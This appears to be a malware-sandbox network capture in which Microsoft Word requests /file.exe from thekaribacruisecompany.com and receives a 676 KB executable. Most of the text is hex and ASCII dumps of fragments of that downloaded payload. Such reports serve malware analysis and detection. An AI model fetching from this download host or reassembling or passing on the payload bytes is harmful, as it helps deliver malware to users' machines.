                                                          • thekaribacruisecompany.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 149.102.154.62 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          2023-03-18 04:35:09 UTC0OUTGET /file.exe HTTP/1.1
                                                          Accept: */*
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: thekaribacruisecompany.com
                                                          Connection: Keep-Alive
2023-03-18 04:35:09 UTC | 0 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 18 Mar 2023 04:35:09 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 676320
                                                          Connection: close
                                                          Last-Modified: Fri, 17 Mar 2023 04:56:55 GMT
                                                          Accept-Ranges: bytes
                                                          Data Ascii: ?c/gZk%%N`Dr OI02,B;S.3O$fYW)Ia/X|R]f&B!e!:f<N7>)=Im }J:pOoo%y)#9)@"6Eu;R:n7JG#@!tZ3.HDwKP: Z
                                                          2023-03-18 04:35:09 UTC528INData Raw: e3 c8 3b 64 0b 45 59 1c f9 87 94 90 79 ae c9 1c 35 a3 b2 79 ae 19 1c 75 a3 b2 f9 ae d9 1c 0d a5 b2 f9 ae fb 39 9a 44 d1 bd ae 47 cc 98 51 cd 05 ae 8d 1c 2d a3 b2 05 ae a7 39 7a 82 ca 16 ba 76 71 f4 22 95 2d 74 bd ca d1 11 2a bb cf f5 26 47 5f 50 d9 7d ae 77 39 fa 95 ca ee 77 7d cc 91 76 e7 16 8a be e0 28 fc ce 12 b2 c8 75 c1 4c 03 95 2d 72 5d e1 a8 29 95 3d e0 ba ca 51 4f 2a 7b c0 25 e5 32 94 49 65 0f ba 9c 1c 15 50 d9 83 2e 1f 47 4b ee ac 17 f9 90 2b 8a a3 4d 77 36 a2 a8 06 47 2f 52 77 8b 5d 89 1c bd 4f dd 2d 76 a5 72 f4 1d 95 2d 71 b5 e0 48 1a ba 85 a2 f6 1c 55 1a 5a 42 96 ba ba 73 14 4f 65 4b 5d fd 39 6a 49 65 cb 5c 43 39 ea 43 65 cb 5c 63 38 ca 1a 7a 55 5a ee ca e1 68 fa d0 eb 14 4d e3 68 21 75 b7 c2 55 c4 d1 63 d4 dd 0a d7 0a 8e 9e a3 b2 95 ae 47 39
                                                          Data Ascii: ;dEYy5yu9DGQ-9zvq"-t*&G_P}w9w}v(uL-r])=QO*{%2IeP.GK+Mw6G/Rw]O-vr-qHUZBsOeK]9jIe\C9Ce\c8zUZhMh!uUcG9
                                                          2023-03-18 04:35:09 UTC544INData Raw: a8 e2 dc 01 f0 78 26 80 6a 9f 32 0a b1 8b 98 24 88 8b 5f 46 0f 17 e5 f7 f7 40 a5 38 ba 2f 90 30 3b f1 e4 61 a4 06 33 53 15 aa 27 3d a5 cd 89 07 b9 64 c4 ea 8c d0 60 d9 5d c8 9a 38 4c 13 2e ea 2f ba aa 3b 97 1d 2f 6c 95 47 bf 3c f6 60 a4 62 b8 4b fd 2a 99 12 23 18 4f dc 5b c4 52 86 20 21 8a e5 0a 23 17 ec 64 11 81 be 66 29 24 cd 49 1c 90 9a 2e 4e a2 ed 91 61 a6 0c 11 29 d1 f7 a4 72 93 19 33 42 f6 76 b1 e8 db 2b 90 0a ac 86 84 24 0f ae fa 90 10 3c b7 91 a7 9b 30 78 d1 8e 8a 9e 68 86 ed 99 c2 24 9a 04 0d 29 ed bf 09 02 62 a4 98 2a a7 b7 67 2a a9 b1 6c 2e b3 35 93 2b 21 cf 40 f0 8d 93 d9 1c ca 16 1a b4 17 14 8b f9 10 41 3a ab 07 c2 24 4c e9 2f 17 c7 cb 19 d7 35 54 ee 2b 1a d6 21 42 a8 ba 90 7a 6e b1 1c 22 a1 32 db 8b 93 6e 95 80 c7 a8 0d 17 4a 57 b9 77 6a 34
                                                          Data Ascii: x&j2$_F@8/0;a3S'=d`]8L./;/lG<`bK*#O[R !#df)$I.Na)r3Bv+$<0xh$)b*g*l.5+!@A:$L/5T+!Bzn"2nJWwj4
                                                          2023-03-18 04:35:09 UTC560INData Raw: 55 61 12 b5 61 12 10 5d 31 92 73 18 1f f4 48 d0 38 81 51 8b 72 53 d1 95 2d 48 22 a6 2c c1 38 0c 3f e2 f2 30 be 33 37 01 d3 c1 66 6e 22 b9 46 d6 71 b3 16 5b 73 a4 af 03 c6 e4 d1 4c 12 9e 5c cb c5 c5 41 4a ec 57 92 20 25 09 52 92 20 a5 e6 28 44 ee 95 b1 a1 df 3f ff 0f 47 15 de 6f b1 90 9f 21 5e 69 6f 9b b9 4d 3f df 4f d3 17 ab d8 77 91 30 78 94 9c 3f 24 e7 47 08 dc 4d ce 27 48 36 7c 92 c0 7d 04 1e 80 02 de 43 f4 1b 48 27 3f 28 83 e2 41 5a 93 98 3b 48 53 d7 dc 3d 14 f3 8b 04 be 4a e0 1b 04 be 4d e0 11 8a f0 26 29 f7 9b 08 17 d9 37 77 2d e1 6f 15 fc ad 84 df 20 38 65 30 f3 98 64 f0 18 d1 6f 14 3a 1b 03 37 0b 7e 33 e1 b7 0a 4e 2b d8 73 77 08 7e 07 c5 7d 5c e2 3e 4e f4 3b 85 7e a7 ae f7 93 22 e5 1e d0 ce 9f c5 68 ed b6 3d 41 06 0c 91 f1 c7 cb 1d 33 cf 26 48 0d
                                                          Data Ascii: Uaa]1sH8QrS-H",8?037fn"Fq[sL\AJW %R (D?Go!^ioM?Ow0x?$GM'H6|}CH'?(AZ;HS=JM&)7w-o 8e0do:7~3N+sw~}\>N;~"h=A3&H
                                                          2023-03-18 04:35:09 UTC576INData Raw: f8 f1 a6 6c 17 f1 e0 19 7f 8e da 5a d3 e5 40 7e 4a bd 3f ee 40 c6 45 4d 9d a0 d7 e8 f4 53 f3 72 74 e9 33 35 a9 b9 39 f9 53 e3 0b 32 8c 79 9a 7c 83 7e aa 79 c5 aa cb 2f 97 ff b2 76 f9 a5 4f 76 4e 9d 98 a3 37 a6 e7 ca c7 1b 8c 99 39 05 f2 30 45 e8 93 53 b5 ba 82 59 9a 0c 20 64 2e 35 7a d4 53 8b fa 47 4c 1d a7 c9 d5 a4 eb 35 42 7c 88 36 93 d9 9f ae ec c1 76 c4 ef e8 19 11 97 ac c2 5b 68 f2 24 f6 9b 0c 01 79 44 7a f9 34 da 0f 3c 2e 40 a1 e0 d2 00 37 46 cc e3 8a ac bf f1 10 92 83 bf a9 10 f0 24 b3 0f 1c 7e 6b 5c 88 42 91 91 05 4e fd f9 19 f4 27 16 42 e2 c6 25 07 a4 c4 c5 12 5d b3 c5 4d 21 eb 2e 1b 5c 22 a1 bb 67 8b 23 74 30 29 0a 70 6a 42 e7 6c 8b 23 74 9e 36 b8 64 42 e7 63 8b 23 74 72 c0 9d 77 01 1c fb 9d 09 1c 8b b7 44 7c 3c 00 2f 90 10 fb ed e5 60 c5 cd 9f
                                                          Data Ascii: lZ@~J?@EMSrt359S2y|~y/vOvN790ESY d.5zSGL5B|6v[h$yDz4<.@7F$~k\BN'B%]M!.\"g#t0)pjBl#t6dBc#trwD|</`
                                                          2023-03-18 04:35:09 UTC592INData Raw: 81 18 52 cf 1f 69 6b 16 c6 00 9e 47 26 8a 27 f0 39 ca 3c bd 52 51 12 e2 67 c7 42 8c e5 be ab 25 ff 63 de 17 39 ff 0d f8 f2 10 fc f5 57 33 ff 63 b7 af 79 f4 14 b7 e4 02 83 09 26 5d 7d 36 13 0c d7 8f 47 73 91 9b 81 c0 c4 b8 eb 4d c9 d7 25 ee 6a 36 3a f0 5e 2e c2 a5 4f 48 44 ef e6 1b e1 51 74 3a 66 76 66 69 9a e9 f8 1c 45 90 82 b6 6c c2 ce 49 9a a7 f4 3a 5c 63 da 6b fa d0 4b 2c fe f2 e3 72 37 7f 9d a8 48 6b 35 7f 76 da a1 fa 77 b0 ff c3 f5 79 40 d8 85 db 19 b5 6e 18 c5 ad e2 1d a4 05 fd a2 90 f6 5b 31 a9 44 bc 7c c6 68 c3 6b 54 32 35 00 a5 e3 58 9c 31 05 69 68 e7 3f 6a 36 e4 50 2a 71 f9 16 a5 84 f7 ff 6d ab 34 58 29 0d 37 53 d1 31 53 aa 60 1b 0d d3 58 13 59 d4 6b dd 83 34 cf 0d 16 f7 f5 30 61 6a dc 34 61 2e 79 dc 50 72 4e 4f 83 5a bb f5 33 14 24 2c d0 f0 f7
                                                          Data Ascii: RikG&'9<RQgB%c9W3cy&]}6GsM%j6:^.OHDQt:fvfiElI:\ckK,r7Hk5vwy@n[1D|hkT25X1ih?j6P*qm4X)7S1S`XYk40aj4a.yPrNOZ3$,
                                                          2023-03-18 04:35:09 UTC608INData Raw: 17 a3 ab fe 58 ce 5d 95 27 1d 41 43 fe 3d 7e 21 98 f3 51 7f f1 f7 c0 20 ec 59 fc ef 18 cc 8e 77 ba a0 dd b7 93 3d 09 ff c1 2d 3d 7b aa 39 7f 6f 33 c4 8d 6f 34 e0 dc 7c e0 52 f3 2a c1 92 c5 f2 8a a5 ee d2 04 d3 e6 98 3a 76 68 12 de 38 7a 37 15 d7 b7 8c 63 c3 18 df a3 f0 7b 32 7e b7 1b df a5 5c 12 61 a2 3c a7 7c 5f 71 3e 9e 2f 5f ce 6b ea 75 0f 9d 5b be ec 7d 0e f9 fe a9 0f fe 46 be 9c f9 01 c9 97 fb 9f 43 f9 f2 db e7 5a c8 97 8f 7f c0 f2 e5 e7 ff 30 d9 ea e4 0f f8 be 24 8b 29 5f ce b6 d2 9b eb 63 c2 e5 cb 0c 6b b8 7c f9 3e 05 26 fa 2b f9 72 ec 73 2c 5f 1e 5d de 8a 7c 19 76 3f 1b 0c 07 10 f9 79 22 ed 03 be f0 25 91 d7 57 79 80 fb 3c 71 a1 7c 2f d9 7e 5c bb e7 0c 6e bf 62 79 6b dc 7e 6e c4 7a 89 e7 d9 c4 8e e5 16 79 e3 db a6 e5 54 c6 a7 cf 1a 65 3c d8 6a 19
                                                          Data Ascii: X]'AC=~!Q Yw=-={9o3o4|R*:vh8z7c{2~\a<|_q>/_ku[}FCZ0$)_ck|>&+rs,_]|v?y"%Wy<q|/~\nbyk~nzyTe<j
                                                          2023-03-18 04:35:09 UTC624INData Raw: 3b 57 c6 66 f5 c9 f9 0a 2d 6e d7 67 17 9e 98 71 2f d4 71 22 2d e8 d0 f7 0f f3 45 a7 b9 32 f6 66 aa 2f 56 a5 6c 80 1f 2e 75 e8 b1 91 be 81 69 58 4b 61 3d b1 f7 33 ea 93 c3 68 e7 01 8a df 20 7e 1f 42 2b b4 4b 39 ea cc d8 f4 e8 52 9c 41 7d 79 dd bf 0c 08 26 b0 ea 74 18 bf f6 0d 99 ab 1f 4b 0b 62 2c 5f 05 0a df 8f b5 4c 8f 43 4d 38 a5 1a a3 95 cd 02 11 03 e3 54 e4 f8 a2 3b 49 44 d7 a9 4f fe 60 a1 43 01 9a 6f cc bc 68 4f 73 94 3b dd 2c cf 3b 94 2e d3 d0 ed a7 b5 8c 0d 05 47 42 59 de 23 44 f7 a9 9e 7f 50 e4 b7 aa 80 82 f2 16 94 90 19 05 35 87 e4 b7 cf 30 7f d4 24 dd 7e 46 7a 1b 04 b1 a0 df f0 84 bd c3 6c 61 5c 78 0b d5 f9 18 63 88 3a e1 03 18 e4 b9 b3 6c 0f 83 9a f1 3a 8a 13 4a d0 d0 97 41 ff 7b 9d f5 f1 e5 bc ca 83 e4 14 b7 1e 56 70 71 49 aa 94 61 03 a2 31 34
                                                          Data Ascii: ;Wf-ngq/q"-E2f/Vl.uiXKa=3h ~B+K9RA}y&tKb,_LCM8T;IDO`CohOs;,;.GBY#DP50$~Fzla\xc:l:JA{VpqIa14
                                                          2023-03-18 04:35:09 UTC640INData Raw: 97 2a b3 1a 97 5c 36 f9 ee 2f 1c 57 3b 6b c6 dd d1 6b df f2 bb 1c 1f 8e eb ed dc f0 8c f5 f3 7d 19 9b 23 fb dd f3 fa e1 de eb 2f 7a 66 7b ee e7 ab 2e 1f f7 d4 c0 1e e9 53 cb 12 2e 9c 7f fd b7 8f b5 7e f6 c2 8c b5 99 bf bc 7f c9 a3 6d df 38 f1 ef 7f fd 50 b8 cd 92 fc d0 e2 bc d2 aa d8 b7 ee 39 af f8 97 fc 97 9e ae 8f 5d fd 23 ab f9 c7 a5 ff 5a 1a ad d3 37 1c 6a b8 75 49 75 7d ec ba cf a2 d9 98 c4 cb dc ad 74 e6 b1 3a 7d dc ed 31 b7 0c 5e 33 72 fc 33 d5 fd 67 98 36 d7 15 c5 e8 cc db e8 f4 95 27 87 66 f7 fe f4 ad d8 97 f6 46 b3 7e 9f b4 e8 5a 78 e6 60 df c4 bd 87 63 6b e7 ab e6 6d 75 f2 ed 75 fa 76 3a fd 27 83 6e 18 7e 5f e6 13 49 77 f6 da 76 c3 19 e7 ac b2 0e af 7e 5a bd fa f9 23 57 3f df d0 7e e0 dd df bf 5a bc ab 83 e3 e5 c5 f1 ce ab 57 7c 17 bd f0 cf fe
                                                          Data Ascii: *\6/W;kk}#/zf{.S.~m8P9]#Z7juIu}t:}1^3r3g6'fF~Zx`ckmuuv:'n~_Iwv~Z#W?~ZW|
                                                          2023-03-18 04:35:09 UTC656INData Raw: 2d ef be 3f 10 bd e2 bc 16 c3 29 d0 f4 44 e9 c3 88 57 29 55 7b 7b 48 3b 55 39 96 59 a4 b2 1f b1 a2 31 87 8a d5 06 54 c1 0c 87 c9 b0 94 4f b7 4e 1e 4b 7a d2 6c c7 ce 72 b9 de b6 2c c6 71 53 9d 97 b9 56 c6 3f 37 d9 95 d4 87 05 48 fc 10 5b 25 98 b0 e4 9b a1 73 94 80 3c f6 ec b4 f9 6b b1 62 9b 40 f9 f5 6a a8 ce 6d b8 61 82 dd 76 9e 89 a3 bb 61 e6 01 d7 3d 5c b7 e5 98 66 97 04 b3 4d 7f 5c ec 34 18 e7 00 20 2f 10 77 38 83 c4 52 dc ca 4a ea f9 4d ae ae 80 59 d3 81 11 29 c9 ff 49 ac ed 58 15 ee b4 b8 0e 64 28 be ef 51 f4 82 f6 43 c5 6d 1e 4f bc e2 3a a8 7c a1 73 62 51 56 6f 43 c9 77 6d c0 ab 00 6b b8 2b 80 f5 8a ac 26 0e d2 d1 b0 92 74 00 de 3a 24 12 c1 eb cd 80 2d 36 5f f2 55 ac 61 b8 36 53 9a 6c 6d 71 95 4c 93 e9 8c f0 09 ee 6c 1a f9 32 78 5e e1 53 08 8d 86 74
                                                          Data Ascii: -?)DW)U{{H;U9Y1TONKzlr,qSV?7H[%s<kb@jmava=\fM\4 /w8RJMY)IXd(QCmO:|sbQVoCwmk+&t:$-6_Ua6SlmqLl2x^St


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          1 | 192.168.2.22 | 49172 | 149.102.154.62 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          2023-03-18 04:35:11 UTC | 661 | OUT | GET /file.exe HTTP/1.1
                                                          Host: thekaribacruisecompany.com
                                                          Connection: Keep-Alive
                                                          2023-03-18 04:35:11 UTC | 661 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 18 Mar 2023 04:35:11 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 676320
                                                          Connection: close
                                                          Last-Modified: Fri, 17 Mar 2023 04:56:55 GMT
                                                          Accept-Ranges: bytes
                                                          2023-03-18 04:35:12 UTC997INData Raw: 18 68 aa f2 d1 51 0e 8e 46 b1 6b 00 8e d0 43 c7 0e 23 d7 b7 14 b1 9e ce 96 31 dd 04 f8 67 cb dc fd c5 8e de ab af ee a6 71 a8 33 6d 8c c7 f2 a9 6a 03 92 1d 09 ab b5 9c 48 f3 7a f3 4d 44 9a b1 2b 22 54 6f bd 9c d9 a0 7a 32 c5 f4 8b 7c bd 81 52 d1 bb d7 13 9f a8 41 18 0c a2 55 6f 32 5b cd 1d 5d e1 a9 76 39 b3 73 00 89 76 3c bd b9 18 b8 0a 0d 95 d2 e9 e2 fd 56 32 71 64 1a c3 93 4d df e4 f1 52 ba c9 e9 a1 21 9a f7 4b 58 64 0d 64 d2 56 1d 22 dd e9 bc 1f a9 64 bd 42 71 70 53 70 a2 f1 fa f4 6c d3 51 59 b9 7f d2 65 b3 0f fe ec f3 a3 02 4a d2 f7 17 7a de ff db 7f fb 32 92 a0 dd 14 d7 19 07 0c dc 6c 53 78 9b 97 49 04 22 cd fe 57 bf b9 f1 b0 4a b6 c2 2d 4e 5c bc 5e 6f 54 ab 02 c8 ce 2d b4 b3 5e 2c fa 86 8a 1e 1f c1 72 af 67 30 ad 32 e1 ba 96 41 56 f2 55 c2 89 87 77
                                                          Data Ascii: hQFkC#1gq3mjHzMD+"Toz2|RAUo2[]v9sv<V2qdMR!KXddV"dBqpSplQYeJz2lSxI"WJ-N\^oT-^,rg02AVUw
                                                          2023-03-18 04:35:12 UTC1013INData Raw: 3c ad 98 9a ae bb 8e a6 19 38 c9 ad 9a 6c 1b 46 34 bd 7b ff 0c 1f 54 d2 aa 54 69 49 e7 2a b9 32 6f 9b 32 04 d2 b6 bd 24 ee 0c c6 60 52 d8 12 b0 37 a3 c6 93 61 d7 32 64 91 07 b6 10 7a c7 5d a1 54 26 e5 f6 e2 64 6e b3 34 91 cb 35 ad b0 9f 20 1a 55 5a 92 dd 1b 7a 22 c9 58 dd 61 6c da b0 42 86 6e 40 28 ba d4 f5 7f 78 77 ab a5 3a b6 24 cb f8 0c 90 d1 bd 27 f7 26 7c bd 41 55 b3 25 de 1b 8e 23 a6 54 97 c1 6d 97 1b 7a 32 9d 76 4c f0 bd 92 66 eb b6 aa 39 9d 83 a1 b0 bb 5e d2 c0 4d 91 0d bc 97 b0 a7 a9 9c ae 0a 94 00 22 a7 ad 54 b6 f2 2d 92 95 1d c7 75 2c 77 74 ba e8 d9 8d 5c be 09 d5 2b c9 7e 37 30 44 91 e7 81 1a 64 2f 4e fc 70 78 78 e0 33 95 9a e0 b9 52 15 64 61 60 73 c5 4c dd 9d ce 9d 06 00 4b ff f4 a4 1b c9 cd 0a 41 f3 14 27 2b 1c 41 52 24 c3 9b be 13 f6 a7 a3
                                                          Data Ascii: <8lF4{TTiI*2o2$`R7a2dz]T&dn45 UZz"XalBn@(xw:$'&|AU%#Tmz2vLf9^M"T-u,wt\+~70Dd/Npxx3Rda`sLKA'+AR$
                                                          2023-03-18 04:35:12 UTC1029INData Raw: e1 85 c9 ef ea 29 5e e9 f4 b4 62 05 ef 6f b3 cd 36 d3 eb ba 0e 2f b0 46 da 1c bf eb d7 0f bf 5c a9 ef c3 4d e2 3b 86 fa 43 46 8f 4e ab 57 a7 e3 52 3a 28 6d c0 1f 67 cc 48 6b d2 5f f8 cd 51 47 e1 76 e7 cc f1 17 d5 e1 1f 71 fd fc 33 7f ed 91 d2 55 f8 cf a1 29 dd 76 9b d6 3a a5 6d b7 f5 93 cd 49 5f a7 54 3b 0d 1a 84 df ea d2 bf 76 c4 85 b7 35 5c 7f 88 97 57 a9 52 e2 d7 ea fa 0a ff fb 1b ff db 99 7f 58 94 ae c0 a5 7b 48 af c5 8b d2 75 ac 7e ed 97 7e ff fd 77 fc 17 cf f4 4d 1a 35 8a 7f f5 69 da 6e bb f4 e9 a7 9f a6 2a e9 ac b3 f8 04 78 90 1f d2 79 e7 9d 87 05 eb d9 33 8d 19 83 af 39 1d f6 04 8b 4a 5b d2 d6 ab f9 93 b0 24 c7 f0 37 95 f3 4f c0 7d dd 8f 4b bf af 92 3e 48 53 a7 4e 4d e5 12 37 c2 6d ba 52 1f dd d6 45 17 a5 13 d2 4d 37 e1 77 0f 3d 84 1f be 67 4a bf
                                                          Data Ascii: )^bo6/F\M;CFNWR:(mgHk_QGvq3U)v:mI_T;v5\WRX{Hu~~wM5in*xy39J[$7O}K>HSNM7mREM7w=gJ
                                                          2023-03-18 04:35:12 UTC1045INData Raw: fb 20 ac c7 40 44 ae c6 1e c5 90 b1 53 63 e2 5b 96 fb 92 47 c6 26 f1 f9 79 66 7d c6 ab 80 ba 99 ce 99 7c 9b 45 c9 1d 59 f8 fa 51 a8 f8 11 7a c3 3a 2a 63 1e cf 9b e5 52 a9 3e d6 d7 1d f5 bf 64 d6 f2 74 cd 84 ad 53 8c bd 1b a7 62 fa 2c c5 b1 b3 53 e4 1a c4 91 2a 07 09 a5 9f a2 91 6c 91 9c f6 92 34 01 c0 99 b4 93 86 36 20 8e 5c 84 bb fa dd bd 22 35 78 03 ff c2 58 7b 19 49 7d 96 27 d0 a8 51 a0 4a 4c 75 b7 ae 37 0e 1e 3e 8a 0b ca 7c 86 2f f6 3a a2 c7 93 f9 3a ab 15 30 75 41 8a 76 2b bf 93 97 35 89 cf d3 25 b6 37 75 2a a7 e5 0e e9 4b 03 f9 f1 99 3c aa f2 f0 c1 51 f7 9c a5 dc 7e 20 de d5 d6 79 80 14 a5 21 a3 63 ee 9d a3 e0 17 21 05 82 c5 6e 67 49 99 a7 d6 3f eb a3 ee 37 05 43 b0 5c cb fa 89 ac f7 aa 5c 5a 65 4b 81 a3 ae a6 65 c2 e5 fe 57 1c 19 08 27 86 fc a6 3f
                                                          Data Ascii: @DSc[G&yf}|EYQz:*cR>dtSb,S*l46 \"5xX{I}'QJLu7>|/::0uAv+5%7u*K<Q~ y!c!ngI?7C\\ZeKeW'?
                                                          2023-03-18 04:35:12 UTC1061INData Raw: 45 a2 3e cc cb ab b1 88 5d 84 28 2f 17 a2 ee 69 1e 6d 39 25 9a a3 b4 93 53 cc ef 70 f9 30 8f c3 8f 3a 80 c5 61 fd 34 b1 56 65 d4 65 1a 00 c2 15 a6 3f b9 06 ef db af fe 1c 96 7a 36 91 34 d5 b0 07 d7 f6 4e 27 15 4a bb 44 86 58 d7 13 4a 8f 57 c1 da 85 63 ac ac 6f 61 53 71 d2 07 5f b9 d6 f4 18 98 f6 08 f9 a8 bf 99 88 34 f7 46 da 4e 1e 56 52 57 0d 19 f4 48 9c f1 4a 7e 24 e1 95 50 e5 12 b5 b8 1e a7 6a 4a bb 76 72 fd db 18 70 97 2e d6 7a df b2 18 91 ee 74 b1 0b 01 84 31 a1 75 7a 3d 8f ca 7b d7 bd f8 19 59 bc a8 09 5a 59 6b bf af de f6 2b cc d4 1e cd 6a 76 7a 9d ba 29 03 76 4a 55 b5 bd bf 02 0e 9b 58 b4 3d 9b 9e 10 99 8a 5b a4 12 a0 9b c7 6e ed ae 8a a6 5e d9 70 4a 05 18 19 b8 23 cf 14 23 22 97 d0 28 15 12 ed 95 a2 d0 67 c4 a8 60 cd ca aa eb f9 81 07 93 d3 60 81
                                                          Data Ascii: E>](/im9%Sp0:a4Vee?z64N'JDXJWcoaSq_4FNVRWHJ~$PjJvrp.zt1uz={YZYk+jvz)vJUX=[n^pJ##"(g``
                                                          2023-03-18 04:35:12 UTC1077INData Raw: ea 23 6a 77 73 7d 6a ce e9 9e ba f7 49 e5 87 c7 34 fa 35 5a 9d b4 39 d7 08 7a a7 6e bd 53 7b 61 a4 da 34 a2 d6 42 3f 69 cc 37 c3 85 9d 47 6f 1d 7f 69 ac da 34 21 80 ba b1 36 6f 24 ab 17 3e bc ba e7 f5 49 cd 04 7c ee f4 82 b9 69 3d 39 71 ed 47 2b 2f ec 9b 37 81 78 00 f3 dc f9 79 b3 73 ea e6 7b c6 73 a3 1a 60 4a d2 e9 b7 ad b9 5a b0 70 fa ce e3 99 67 47 2b ba 19 15 0b bd 4c 9b d5 e3 e5 73 0f 6e 8c bd 36 de d0 74 37 2d 5a 89 59 75 f2 f5 0b f7 17 0f 1c ad f0 a8 d3 4e 27 6c ce 1b e9 f6 85 ab dd a3 87 27 9b b0 9e fb fd 4e a4 59 51 da 69 75 5a 4e 75 be 06 e0 d7 ea 77 13 00 bc 34 c7 11 98 33 d3 73 cd a8 bf dc cf 5d a8 97 76 07 b6 ab 3e 3b 53 d5 03 70 00 58 8c ee b2 76 27 d4 6b 30 85 29 83 24 43 38 6e f5 0b a3 5a 83 5c c5 f5 ed 76 08 2c 8c bb 41 07 3b 8c 85 e5 ed
                                                          Data Ascii: #jws}jI45Z9znS{a4B?i7Goi4!6o$>I|i=9qG+/7xys{s`JZpgG+Lsn6t7-ZYuN'l'NYQiuZNuw43s]v>;SpXv'k0)$C8nZ\v,A;
                                                          2023-03-18 04:35:12 UTC1093INData Raw: ac 24 20 08 a4 b5 b8 75 e5 cc 14 78 9e a3 36 6c 26 18 a5 dd 96 04 1b a9 4f e3 ac bd ba 7d b9 7d e4 18 e7 a6 61 ef 5c d3 8d f1 ee be 2f 5a 80 b9 18 bd f5 9d 33 cd c3 33 66 10 ba ba 25 cd 88 5a 6d 95 58 2d 19 39 c5 c2 c2 42 d7 9b af e8 1e e7 af 62 4f 23 9c 8c 12 98 40 6a 5d e6 07 e4 b9 a3 41 54 b1 07 9e 27 3d 07 65 78 09 f6 26 6d b5 5b b0 3a 72 4f 93 0e 7f d8 6f af 6c d0 a5 0c c7 bc db 6d 33 5b 9a 4d f8 54 63 16 e9 c7 a4 b2 28 63 f6 35 6f b1 a9 05 bd 50 10 96 52 4b ab 0a da d9 c5 81 cd 6c 5b 29 fb 24 32 61 82 36 99 42 dd aa 62 9d 61 fb 16 ee 0e ea c1 4e 5b ae 18 26 be aa 20 97 d2 7a 80 d5 2e 1b 51 ba be 34 59 97 64 47 b9 71 d9 0b 81 13 21 15 0e 15 24 4f 9c 55 f6 1d 0a d4 48 6a 58 f6 6c 13 e3 7a aa d6 c7 95 39 0c 6a 16 1f 6d 27 ba 4b a5 6b 95 6a 05 e0 33 f0
                                                          Data Ascii: $ ux6l&O}}a\/Z33f%ZmX-9BbO#@j]AT'=ex&m[:rOolm3[MTc(c5oPRKl[)$2a6BbaN[& z.Q4YdGq!$OUHjXlz9jm'Kkj3
                                                          2023-03-18 04:35:12 UTC1109INData Raw: c3 dd fb 2e 87 aa c6 6a 94 81 dc 86 43 3d bb 4b b9 ae d9 1c 0e c6 cb 55 c7 7d 3f 4c 8b 5e cf d7 e8 a7 92 31 14 72 77 19 89 d1 e9 67 1c e2 1d ca 44 09 2f 2c a7 82 c5 79 a7 13 18 96 c7 f6 95 e5 c0 10 35 81 a0 e8 66 38 36 19 f2 a7 66 51 a8 cb d3 56 47 15 17 c9 e4 4c 69 d1 2f b3 45 b2 76 c1 16 bc 6a 4e 83 1a f2 c2 81 03 49 de 8e 6d c7 0d be 99 95 a6 26 10 64 45 11 48 18 5a 8d 2a 2b 5b ac 47 71 d6 4a dc a7 97 fb bb cd e2 a3 24 cf 55 99 f2 ee 34 81 b2 49 3c 48 da 67 b1 a5 9a 5f a0 fa d8 cb f5 1c 1f e2 7d d3 08 bc ec 58 0f 92 e6 44 cf dd 66 fd 4f 7b a7 c7 2c a6 f7 9f f6 a9 7f da 21 9d 63 48 dd dd fe e2 c1 d3 ff e7 d4 06 ef 7f bd 5c 4d ba f0 bd e0 9b 6e e4 bb cd c6 d9 85 e2 e9 48 0d 7f f7 bb 72 a7 fe a0 17 bb 5f f6 3c 57 c3 1c fe e0 a1 e5 a0 85 68 f7 f2 20 fc 83
                                                          Data Ascii: .jC=KU}?L^1rwgD/,y5f86fQVGLi/EvjNIm&dEHZ*+[GqJ$U4I<Hg_}XDfO{,!cH\MnHr_<Wh
                                                          2023-03-18 04:35:12 UTC1125INData Raw: 67 a9 9e 7c e8 4c f2 af c1 7e 14 93 1e 3f b4 c9 7e 37 d5 6c e1 19 bc 22 71 2f 2e 2b 62 93 01 4e 1c 33 4d bc 52 70 79 18 b4 a4 4b 3e 9c 07 96 66 82 7d d0 d2 64 50 09 2f e5 3d b3 d0 9d 43 cb dd ec 6b 95 6c d2 8f af 51 66 11 71 76 03 c3 d9 01 7c ff 86 d8 89 81 be 7f d6 c9 c6 b3 c9 6c 9a 63 07 a6 27 43 19 3c 03 e6 66 13 d9 54 36 a3 a2 ad ce ab 93 b5 9d cc 47 f4 99 ec 0f ce 26 40 c5 1e 4c ab 32 72 3f 20 f6 84 67 3c bb ee 93 4d 26 63 e7 d7 24 3a 74 34 c0 10 97 cc ac df 05 31 7b bb 6b c5 fd 81 94 6d 55 6d 32 d5 48 8f d5 8e 24 87 5a 5f 34 fa 45 db 8b ce 86 5f 34 7a e9 a8 71 e3 b2 f1 58 15 b7 38 5e dc b5 37 5d bf 2c 1a 77 bc 8d 31 97 71 ad 65 48 3a 90 cb b8 88 a1 52 73 96 6c fd b2 8d 52 24 58 5e 2a a4 66 c4 ae 7f b3 b3 4a e2 d8 92 56 64 2d 8a 9c 56 4a 1a ef 13 b9
                                                          Data Ascii: g|L~?~7l"q/.+bN3MRpyK>f}dP/=CklQfqv|lc'C<fT6G&@L2r? g<M&c$:t41{kmUm2H$Z_4E_4zqX8^7],w1qeH:RslR$X^*fJVd-VJ
